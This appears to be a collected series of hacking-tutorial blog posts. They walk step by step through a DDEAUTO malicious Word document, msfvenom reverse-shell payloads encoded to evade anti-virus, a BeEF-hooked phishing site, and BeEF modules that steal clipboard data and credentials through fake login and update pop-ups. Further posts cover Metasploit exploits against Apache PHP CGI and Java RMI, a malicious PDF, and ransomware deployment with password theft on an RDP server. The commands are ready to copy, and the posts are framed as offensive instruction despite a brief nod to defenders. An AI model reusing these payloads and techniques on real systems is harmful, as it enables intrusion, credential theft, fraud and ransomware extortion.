Creating a Cyber Attack – Part 5 (Post Exploitation – With BeeF )

In this video we pick up where we left off in Part 4. We have socially engineered our victim to visit our malicious website which has provided us with an initial connection to the victim machine. Attacker on the right, and victim on the left.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

We will show a few simple techniques you can use to get a meterpreter shell to get a better foothold on the machine and maybe achieve persistence (permanent connection), and gather other information from the victim machine post exploit. Our victim machine has our malicious site and Facebook open in their browser.

The BeeF modules we will be going through are;

  1. Get Clipboard
  2. Detect Social Networks
  3. Pretty Theft
  4. Fake Notification Bar
  5. Fake Flash Update

Let’s get straight into it;

Get Clipboard – This is a simple one, and is under “Hosts” in the folder structure. The module will basically grab anything that is stored on the victim machines clipboard. In our example the victim has copied their credit card number to use in a website to buy something. We select the module and run “execute”, then after it has grabbed the info it is displayed in the window as shown.

Detect Social Networks – Another self-explanatory one here. This module is below “Network” in the folder structure and allows us to see which social networks the victim is logged into (as in real life you won’t see their desktop obviously). Why do we want this? Well if you know what they are logged into you can use the next module “Pretty Theft” to steal login details. We simply click execute on this, nothing else to configure.

Pretty Theft – This module is really simple to use, and basically provides us with some login box templates which we can pop-up on the victims screen to attempt to trick them into thinking their session has expired and they need to login again. Pretty Theft is under “Social Engineering” in the folder structure, and is simple to configure offering only basic config options. In our example we know the victim is logged into Facebook so we pop-up the Facebook template, then collect the username and password in the window as shown.

We then do the same, except we change the pop-up to a Windows themed box to try and get the Windows password of the victim as well.

Fake Notification Bar (IE) – This module will show a fake notification with a message and payload of your choice at the top of the victim machines browser. We keep the standard message, but specify our custom payload which will allow us to get a meterpreter shell on the victim allowing us more access to the machine. We fire up our listener in metasploit then show the pop-up which the victim clicks and installs our malicious payload. We then check metasploit and can see we have an active connection, which we confirm by running sysinfo.

Fake Flash Update – This works in much the same way as the module above, and can also be found under Social Engineering. We provide the URL of the custom payload we want to deliver and the location of the pop-up image we wish to use, in this case Flash, but you could use any update pop-up, we are just using flash in this demo. Once you have added your URLs again just hit execute and the victim will receive your pop-up.

That’s all done in under 5 minutes, so you can see just how scary this is and how quickly it can go wrong. We are going to leave this here, and in the next video we will be covering post exploitation using Metasploit and meterpreter.

Creating a Cyber Attack – Part 4 (Exploiting – Getting Access )

In Part 4 of this series you can sit back and enjoy the fruits of your work as all we need to do now is ensure everything is running then launch our attack. We will email a link to our victim and then once the file is downloaded and opened we will see how everything fits together to exploit the victims computer. Come back for future videos when we will show some post exploitation steps we can take now we have control of our victim.

If you have not read the previous explanations or watched the videos I recommend taking a look as all the steps are shown and explained in detail, so if you are not sure about something shown here, go back and read the previous guides.

First in our Kali machine we check that BeeF is running by going to our browser URL. You can also see there are no online browser sessions at present in the left hand menu.

Next we ensure our malicious website is running.

Then if have not already done so we create our listener in the metasploit framework on our attacking device so the malware has something to connect back to.

use exploit/multi/handler

Load our payload

set payload windows/meterpreter/reverse_tcp

Configure our payload, by setting the listening host (lhost) to our attacking machines IP address.

show options

set lhost 192.168.56.106

Then start the listener

run

Now we are ready. At this point the demo starts to show the victim reading the email. clicking the link, downloading the file then opening it. Activating the malware and connecting to our site.

As soon as the website opens we will have a connection in BeeF as this does not require any user interaction with the site and injects the malware automatically when the web page is visited. You will see online browsers in your web console.

In our demo you will also see us use the commands tab to launch a social engineering attack by using the “Fake notification bar” exploit built in to the console. We can use this to load additional malware onto the system by getting the user to click on the bar and accept the prompt. We will cover this in more depth in future videos.

To get our meterpreter session we need to get the victim to download our security software as advertised on our website and in the malicious document.

Once the victim has carried out these steps you will see the connection in meterpreter. We then run the sysinfo cmd to show we are on the victim machine. Again we will be showing some post exploitation steps in future videos so stay tuned for those.

As you can see from this sort series of videos there are multiple ways that malware can infect your PC, and I hope we have demystified it a little as well.

Cyber attacks will have fall back measures to provide the best odds that if a link is clicked or document opened that they will be successful, which is why we have shown 2 different methods in this demo from the same malicious document.

This has been a very simple demo showing simple methods but I hope we have helped to show the type of things that can happen.

Until next time.

Creating a Cyber Attack – Part 3 (Creating a malicious web page )

In the third video in this series we will show how to make your malicious web page. Our web page will host the malicious file, and script we prepared in Part 2. This is the website our malicious document will open which we created in Part 1.

There is not much to do in this video as we are simply copying over the payloads we have already created to our web server, and creating a basic web page where the payloads will be launched from.

We are using Kali as our web server as it comes with Apache pre-installed, however most linux web servers use the same default location for web files.

We browse to the location at “/var/www/html/” then create a new folder named “secure” which is for our new web site.

Now we copy over our secure images which we used in Part 1 to create our malicious document, the malicious exe we created in Part 2, and create a new html file named index.html.

In the video we use the cmd “gedit /var/www/html/secure/index.html”

gedit is the name of the text editing application, and /var/www/html/secure/ is the location, and index.html is the file name. NOTE: If there is already a file with that name in the specified location it will open that file, if it does not exist it will create a new file with that name.

Let’s look at the content of the index.html file. We’ve highlighted the location of the images and the payloads.

Starting at the top we have the BeeF script we created in Part 2 in the head section.

Then in the body section we have the securesystem.png image, and the secure.exe download link in the a href tags.

We have also fluffed out some content to make the page more convincing for when the victim is taken to our site.

You can copy the above html code and just replace the images and payloads with your own.

The final thing we do in the video is make sure the web server is running by using the “Service apache2 start” cmd.

Now we are ready to go to the next video where we will string everything together to see how the attack will launch against our victim when they open the document.

Creating a Cyber Attack – Part 2 (Creating Malware Payloads )

In part one we created our Word document which will run the initial stage, and here in part 2 we will be creating the two malicious payloads which will be used in our malicious web page which we will make in part 3.

We will be using Beef to make use of it’s browser hook which runs javascript on the page load to attempt to “hook” the victims browser.

We will also be using msfvenom to create a malicious exe which we will make available on our malicious website and attempt to “socially engineer” the victim into downloading and installing it.

What you need;

  1. Kali linux (comes pre-installed with both Beef and msfvenom)
  2. Beef
  3. msfvenom
  4. Less than 5 minutes

Login to Kali and open two terminal windows.

First off let’s get Beef running, in kali we simply type “beef-xss” and you should see the following output once it has started. The first time you run this you should also be prompted to create a password. Obviously note this for logging in later.

Copy the script as highlighted above, you will need this for part 3.

The browser will also automatically open to provide access to Beef’s Gui which we will monitor for victims once our site is live. If it shows an error message “unable to connect”, wait a few minutes then refresh the browser window and you should see the login screen. Note this url (also shown in the screen shot above)

Login and have a look around, it’s a great tool and we will use it in other videos.

Now let’s move on to making our malicious exe.

In our next window we are going to paste a prepared cmd into the terminal shown below;

Let’s break this down to help you better understand what we are doing;

  1. msfvenom – this is what we are using to create our payload
  2. –platform windows – the payload is targeted to Windows operating systems
  3. –arch x86 – our exe will be 32-bit
  4. -p windows/meterpreter/reverse_tcp – the malicious payload will be a reverse meterpreter shell we can connect to using metasploit.
  5. -e x86/shikata_ga_nai – specifies the encoder we want to use for the payload
  6. -i 5 – specifies the number of iterations of encoding. (The better the encoding the more likely it will bypass anti-virus protections)
  7. -b ‘\x00’ – specifies to avoid bad characters while encoding, in this case we want to avoid null.
  8. LHOST=192.168.56.106 LPORT=4444 – this is the IP and port of the machine we wish to connect back to from the victim. (Our attacking machine).
  9. -f exe– this is the file type we wish to create
  10. > secure.exe – and finally the file name we are creating.

If it is successfully created we should see the below message.

Save this file somewhere ready to upload to our server.

That’s it, we have our 2 payloads ready to use in our malicious website. See you soon for part 3.

Creating a Cyber Attack – Part 1 (Making a malicious Word document using DDE)

In this new series we are going to be making a malicious Word document, which will connect to our malicious site and automatically run malicious code to give us access to the victim, but also give us a fall back where the user is also prompted to install a secure file viewer should our automatic code not run. This gives us 2 chances to infect the victim machine.

Office documents allow us to execute code, in the same way as a website would, so using some simple scripting we can create a document which when opened auto prompts the user to click a pop up, and then automatically connect to our malicious website to download and run Malware.

If you are a defender the most important thing to understand is how attacks like this work so you know what you are looking out for. With that in mind, let’s go make some Malware.

In part one we are only creating the document itself, adding some images and text to try and socially engineer the victim user into thinking it is legitimate and click the pop up box. Also to test that the script works and opens a website. In this demo we will be using http://legitimate.website.com which is just a test site for this demo, so you will need a different website to open. At this point we are just testing the script opens a web page so if you don’t have a website you can just use https://google.com.

What you need;

  1. Microsoft Word
  2. Some free security images downloaded from the internet
  3. Some made up text to put in the document
  4. A Windows pop up screenshot
  5. This piece of code; DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “
  6. Less than 5 minutes.

Open up Word and create a simple looking document which will tempt your victim to accept the pop up when they see it. Pop some images in, and be creative with the text in the document. Ours is shown below.

Now we need to insert the script which will open the website when the pop up is clicked.

Move the cursor down the page and then click “Insert” from the ribbon menu, then “quick parts” then “Field” from the drop down menu. Ensure “=(Formula)” is selected then click OK.

Then you should see the below in your document. This is our formula field

Right click and choose “Toggle Field Code”

Then you’ll see this;

Clear the code and insert our code as shown

DDEAUTO c:\\windows\\system32\\cmd.exe “/kstart iexplore http://<yoursite> “

Save and close the document, then to test re open on your machine. If the website opens as in the video you are ready to move on to the next step.

Hacking web servers – Apache PHP CGI (Easy Hacking)

Apache is widely used on hundreds of thousands of web servers across the internet. Therefore the chances of finding Apache servers which are running older versions is highly likely, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for older versions and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV -sT –version-all -p 80 192.168.56.103

There is a great cheat sheet here for nmap cmds to help better understand what we are doing; https://www.stationx.net/nmap-cheat-sheet/

This shows us that port 80- is open, that it is running Apache and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that as the first part denotes the year is was discovered.

Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.

I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to it’s age, we just decided to use this one as it is super reliable for the video demo.

Let’s fire up metasploit and find it.

search type:exploit multi/http/php

We could has also searched by date. Anyway, the one we want is number 0 so we simply type

use 0

It has already configured a payload for us so we check the info on the exploit

show info

Once we’re happy we check which options we need to add to allow it to run.

show options

We can see in the options what is required and what is not by reading the “required” column.

The port is correct (80) we need to add RHOSTS and LHOST
  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want.

Hacking web servers – Java (Easy Hacking)

Java is rarely updating on web servers and so more often than not when you see it on a web server it will be way out of date. This makes it easy for attackers to get in. Here we find a server running Java RMI on port 1099 and show how we can then fully compromise the server in under 3 minutes, and access the password file.

We touch on this time and again just how important it is to stay up to date with application and OS versions. This again shows that if you are not updating just one component on your web server it is at risk of being compromised very quickly.

In this tutorial we are using just nmap and metasploit framework which are built into Kali linux which we use for most of our tutorials. Download is here; https://www.kali.org/downloads/

First we scan the web server which has an IP address of 192.168.56.103 with nmap to identify open ports and the services running on those ports using the following cmd.

nmap -sV 192.168.56.103

We can see Java RMI running on port 1099

Next we head over to the metasploit framework to search for any built in exploits we may be able to use.

search type:exploit platform:java rmi

The cmd above is pretty self explanatory, we are performing a search with a type of “exploit” for the platform “java” and addition item “rmi”. We recieve the following output;

See the highlighted module we will use

To load this module we use the “use” cmd

use exploit/multi/misc/java_rmi_server

It informs us it has already selected a payload so next we list the “info” page

info

Then once we are happy we know what we need to configure we load the options

show options

We can see in the options what is required and what is not by reading the “required” column.

Everything is set for us except the RHOSTS and LHOST settings which we need to ensure have the correct IP address.

  1. RHOSTS – This is the Remote hosts or the victim machines. We need to set the correct IP address so the exploit knows which machine(s) to target.
  2. LHOST – This is the listening host. This is your machines IP address so the exploit knows which machine to connect back to with the remote session spawned by the exploit.

We do this by using the “set” cmd

set RHOSTS 192.168.56.103

set LHOST 192.168.56.106

Now we have everything configured we just give the “run” cmd which starts the exploit against the victim, and you can see from the video just how quick it is.

All we do now in the demo video is run the “sysinfo” cmd to show we are on the victim server, and then we access the password file by using;

cat /etc/passwd

“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can login as admin/root and do whatever we want. All because no one updated Java!

How to capture a web page request – Stealing Customer Credit Card Details part 2

This a quick blog off the back of numerous requests for an additional guide for a video we posted on YouTube. https://www.youtube.com/watch?v=cThifvgCcPc

In the above video we show how you can steal credit card numbers straight out of the database by using a legitimate web page request and feeding this into sqlmap.

If you want to know how to capture the web request then this tutorial will show you.

In order to capture the request we need a proxy which sits between the website and our browser which will see the raw data of the requests and responses. This not only gives us visibility, it also gives us the ability to manipulate the requests, but we shall save this for future blogs.

In our demo we are using Kali from here; https://www.kali.org/downloads/ which is a hackers operating system which comes with a browser proxy pre-installed, and so we shall be using Burpsuite. You can install Burpsuite separately if you wish from here; https://portswigger.net/burp/communitydownload

However if you are just starting out then I recommend downloading Kali and installing on Virtualbox; https://www.virtualbox.org/wiki/Downloads as Kali also includes sqlmap which is the other application you need to complete the full attack as shown across both videos.

There are plenty of guides on YouTube so we won’t be covering installation here.

Let’s get to into it;

The reason this method works so well is because you are providing a LEGITIMATE request to the web server, what does this mean? Well, if you are not a member of a web site and you try and login you will get denied access as you don’t have valid credentials to login, this is not a legitimate request. If you are a member you provide your username and password and you are permitted access to the website, this is legitimate.

How does this help? Well alot of webistes have a “manage your account section”, “search for past purchases”, or “my payment information” all of which allow you to search information in your own account. If the website is not coded correctly however, you may be able to use this same search in YOUR account to actually return information from OTHER users accounts. This is where the legitimate response comes in. You are using a legitimate request to the website, and seeing if this can be manipulated to allow the return of more information that expected. This technique is called SQL Injection.

In this demo we are using an account details lookup page to perform this attack.

We are logged in as canaryman, and submit a search for our own account, and this completes as expected.

Burpsuite is already running, but in order for it to be able to intercept the requests we need to configure our browser to use Burpsuite as a proxy. For our machine we go to the browser settings > network settings > then configure as below;

It will be very similar for all browsers, the thing to remember is you are using your localhost address 127.0.0.1, and Burpsuite runs on port 8080.

We now perform the same search again but this time we go to the PROXY and INTERCEPT tabs, and set “intercept” to on. This catches the request as it leaves the browser and before it hits the web server.

We save this to a file as shown, then forward the request so it completes. That’s it.

Watch https://www.youtube.com/watch?v=cThifvgCcPc to see how this request is used to get other users credit card details from the website.

How to make a malicious pdf (Making Malware)

If you’ve ever wondered what it takes to make basic malware, then this is for you.

Malware sounds like a dark art, but put simply malware is just a computer application that does something on your machine which enables a criminal to achieve their goal. You might have Word.exe on your computer for creating and writing documents, well malware might be something like passpad.exe which steals passwords from the machine. Simple, and malware is as easy to make as any computer application, it works within all the same parameters as a legit application, it just depends on how complicated it has to be to fulfill it’s purpose.

In this video tutorial we will show you how using free software you can create a simple malicious PDF. In this PDF we will hide our malware.

We first fire up metasploit to create our new pdf.

We perform a search of known vulnerabilities and exploits available for us to use, then once we have picked what we want to use we start creating the document that we’ll send to our victim hoping they run it. Once we have created our pdf we upload to a webserver where it will be downloaded by our victim. More often that not this will be sent as a link in an email, but we use this method here to keep the video short. (We will cover emailing malware in a future video)

You see the connection to the attackers machine instantly as soon as the document is opened. You’ll notice the extra pop up box before the document opens, but you’ll be surprised how many users just click through without reading them or being suspicious! Again this is simple malware, with more time we can eliminate the amount of user interaction required to make it almost silent. We can also add content to the pdf so it looks like a real document and not just blank. Again, we will work through creating more convincing malware in future tutorials.

Meterpreter commands used in this video are;

  1. search type:exploit platform:windows adobe pdf Simple search of the database for exploits for our chosen victim.
  2. use exploit/windows/fileformat/adobe_pdf_embedded_exe  This selects the chosen exploit.
  3. show options lists the options required to build the pdf
  4. set payload windows/meterpreter/reverse_tcp the malicious payload hidden in the pdf
  5. set FILENAME payroll2020.pdf name the pdf
  6. set LHOST 192.168.56.106 set the IP address of the attacking machine so the exploit knows where to call back to
  7. show info displays information about the exploit.
  8. run creates the pdf
  9. use exploit/multi/handler selects the listener which “listens” for the malware to call home to connect
  10. set payload windows/meterpreter/reverse_tcp this matches the payload hidden in the document and should connect to the same IP unless you are using VPNs or proxies.
  11. show options lists the options required for the listener and payload
  12. set LHOST 192.168.56.106 set the IP address of the attacking machine to listen on.
  13. run starts the listener
  14. sysinfo; this gives us the info of the infected system we are connected to.
  15. shell; this launches a hidden Windows command prompt which allows you to run native Windows commands. Which we use to launch “notepad.exe” and “calc.exe” as a demonstration that we are on the victim PC.

In future videos we’ll also show you how to spot this type of malware and stop it. Well I hope this has been useful, until next time.

Deploying Ransomware (Hacking RDP Servers Part 4)

I hope you have enjoyed this short series of RDP hacking. The aim was to show how quickly things can snow ball when just one user becomes compromised on a shared resource like an RDP server. Anyway, back to this last video in the series.

If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.

As a recap we have compromised the guest user on an RDP server, then dumped all available credentials from memory, we then cracked the hashes and see what other credentials we get.

We managed to crack 3 of the hashes giving us the logins for the following accounts;

  1. backup.adm
  2. server.adm
  3. thirdparty.adm

We logged in with thirdparty.adm as in general these accounts are poorly maintained, and not regularly used. There are also used by lot’s of different support engineers so changes or suspicious activity is unlikely to be noticed, whereas an admin for the company themselves are usually more diligent.

We want to copy over some malicious files but find that clipboard/copy and paste is disabled for this account meaning we need to find another way to get our files on the target machine.

We start another listener in metasploit, then manually browse back to our evil website which we used to compromise the guest account as we know this works and was not spotted previously.

We download and run the malware which gives us a backdoor into the machine.

We then use meterpreter to upload our ransomware file which we will use to encrypt the entire server, and also download any files of interest. We take passwords file (Although in reality we would take a copy of EVERYTHING) as vendors will often reuse credentials so we save these for if we come across this thirdparty again or perhaps use them to start a targeted attack against the third party vendor. We could also take the installer, inject it with malware then upload to a “freeware” site offering it with licence keys for download to help us infect more machines. Everything can be used in some way to help us in our malicious activities.

Meterpreter commands used in this video are;

  • upload RansomwareFile.Docx.bat c:\\users\\thirdparty.adm\\Documents\\RansomwareFile.docx.bat; Here we use the “upload” command, followed by our ransomware malware file, then state the location on the victim we wish to upload the file to. Note the double back slash.
  • download c:\\users\\thirdparty.adm\\Documents\\passwords.rft  Here we simply use the “download” command and state the file and location. Note the double back slash.

Once we have stolen all we want, we just need to run our malware. Now we want to ensure that it runs with the highest permissions so it has access to as much data across the machine as possible. This is where we will use the server.adm, or backup.adm accounts if we need them.

We right click to run our malicious file as administrator and bingo, we do not even need our other accounts. The third party account is running with local admin so our ransomware completes without issue. Success!

Hope you enjoy the video, and this series. We will pick a new topic and do another short series.